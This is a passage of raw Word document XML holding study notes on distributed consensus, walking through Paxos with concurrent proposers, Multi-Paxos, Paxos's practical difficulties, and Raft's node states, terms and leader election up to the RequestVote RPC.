        <w:t xml:space="preserve">  Majority accepted → "X" is CHOSEN. ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45272D2F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="0AFD3740" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>What if B's proposal arrives concurrently?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3D3731" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="5A7B1B55" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Round 2 — B proposes "Y" (after A's PREPARE but before A's ACCEPT reaches C):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD45F20" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  B → A, C: PREPARE(2)  (higher number!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515220E5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  A: already accepted "X" at proposal 1. PROMISE(2, "X", 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C4DBF7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  C: hasn't accepted yet (A's ACCEPT hasn't arrived). PROMISE(2, null)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59376659" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  B has majority of promises. But A reported accepted value "X" at proposal 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5E5972" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  B MUST propose "X" (not "Y"!). This preserves the already-committed value.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679A4094" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  B → A, C: ACCEPT(2, "X")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AC69A0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Accepted by majority → "X" is still CHOSEN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="285CDC45" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7AFEF0" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Key insight: Once a value is accepted by a majority, no future proposal can override it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4292F5AF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>The "adopt previously accepted value" rule ensures this invariant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE812C4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.4 Multi-Paxos (Sequence of Decisions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5424BB06" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="0049626E">
        <w:t> Single-decree Paxos decides ONE value. Real systems need a SEQUENCE of decisions (replicated log).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2027BC82" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Multi-Paxos optimization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F778D36" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18711D1F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Instead of running full 2-phase Paxos for every value:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4676F332" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  1. Elect a stable LEADER (run Paxos once to agree on the leader).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5CA333" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  2. Leader proposes ALL subsequent values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EDB3CA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  3. Since no contention: Phase 1 (PREPARE) is done ONCE for the leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02174B8A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  4. Each new value only needs Phase 2 (ACCEPT) → 1 round trip!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B9A9F9" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="37BAA22E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Steady state (stable leader):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DEC9EB3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Client → Leader: "Value V"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4990E04A" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Leader → Acceptors: ACCEPT(slot=47, value=V)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F9579D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Majority of Acceptors: ACCEPTED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A30EFB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Leader: committed! Notify client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F829111" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0429DF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  Just 1 round trip per consensus decision (same as Raft).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC70AAE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.5 Why Paxos Is Difficult</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F197AA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A544886" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Problems in practice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6F0882" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - The paper describes single-decree. Multi-Paxos is underspecified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A6362D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - No canonical implementation reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477912BF" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Leader election is implicit (not clearly specified).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD0FE49" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Log compaction/snapshotting not addressed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB7E248" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Reconfiguration (adding/removing nodes) is complex.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F709AA1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - Many edge cases in implementation (livelock, dueling proposers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE8EE59" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C0CC0B2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>This led to Raft: "an understandable consensus algorithm" (2014).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204949E1" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:pict w14:anchorId="6CA8A1DE">
          <v:rect id="_x0000_i6242" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A3EEB7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Raft — Designed for Understandability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A09C23D" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.1 Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736D7D3E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Raft (Diego Ongaro, John Ousterhout, 2014) provides the same guarantees as Multi-Paxos but is designed to be understandable. It decomposes consensus into three independent sub-problems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6AA09E" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A0B938" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>1. Leader Election: How to choose a leader when the current one fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEE81CB" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>2. Log Replication: How the leader replicates entries to followers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F62AAE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>3. Safety: Why it's guaranteed that committed entries are never lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D01845" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 Node States</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3FFEB6" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151B5879" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Every node is in one of three states:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551DD0F4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="73E606EA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>┌──────────┐    timeout, start election    ┌───────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA43CE3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│ FOLLOWER │ ─────────────────────────────→│ CANDIDATE │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C0B04C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>│          │←──────────────────────────────│           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203839AA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>└──────────┘  discovers leader/higher term └─────</w:t>
      </w:r>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2808F15F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▲</w:t>
      </w:r>
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">                                          </w:t>
      </w:r>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A208F57" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">      │                                   wins election</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2807E6" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">      │     discovers higher term               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C3CFCE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">      │   ┌────────────────────────────────┐    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2307F618" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">      └───│           LEADER               │</w:t>
      </w:r>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>◄</w:t>
      </w:r>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>───┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0378ABB2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          └────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475F8F40" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="38075DF2" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Initial state: all nodes start as Followers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DABE2A3" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Terms (Logical Clock)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162232E7" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3907776C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Time is divided into TERMS (monotonically increasing integers):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7D4A37" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="579513F8" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Term 1        Term 2        Term 3        Term 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2BF1D4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>[Leader A]    [Election]    [Leader B]    [Leader B]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E91899" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>──────────────────────────────────────────────────────── time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E618378" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="6DFD5CEC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Each term has AT MOST one leader.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE2AAC5" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Terms act as a logical clock:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BE03BC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - Every message includes the sender's current term.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A217AA" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - If a node receives a message with a higher term → updates its term, becomes follower.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2272C2D4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  - If a node receives a message with a lower term → rejects it (stale).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A91256" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C31467C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Terms prevent "split-brain": an old leader with a stale term is immediately rejected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2969C356" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 Leader Election — Detailed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59778E3C" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trigger:</w:t>
      </w:r>
      <w:r w:rsidRPr="0049626E">
        <w:t> A follower's election timeout expires (no heartbeat from leader).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A988563" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28420EE4" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>Election process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09421833" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
    <w:p w14:paraId="47A7080F" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>1. Follower increments its term: term = term + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DED15BE" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>2. Transitions to CANDIDATE state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B680240" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t>3. Votes for itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202B1E34" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:lastRenderedPageBreak/>
        <w:t>4. Sends RequestVote RPCs to ALL other nodes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31327946" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E">
      <w:r w:rsidRPr="0049626E">
        <w:t xml:space="preserve">   RequestVote(term, candidateId, lastLogIndex, lastLogTerm)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786337BC" w14:textId="77777777" w:rsidR="0049626E" w:rsidRPr="0049626E" w:rsidRDefault="0049626E" w:rsidP="0049626E"/>
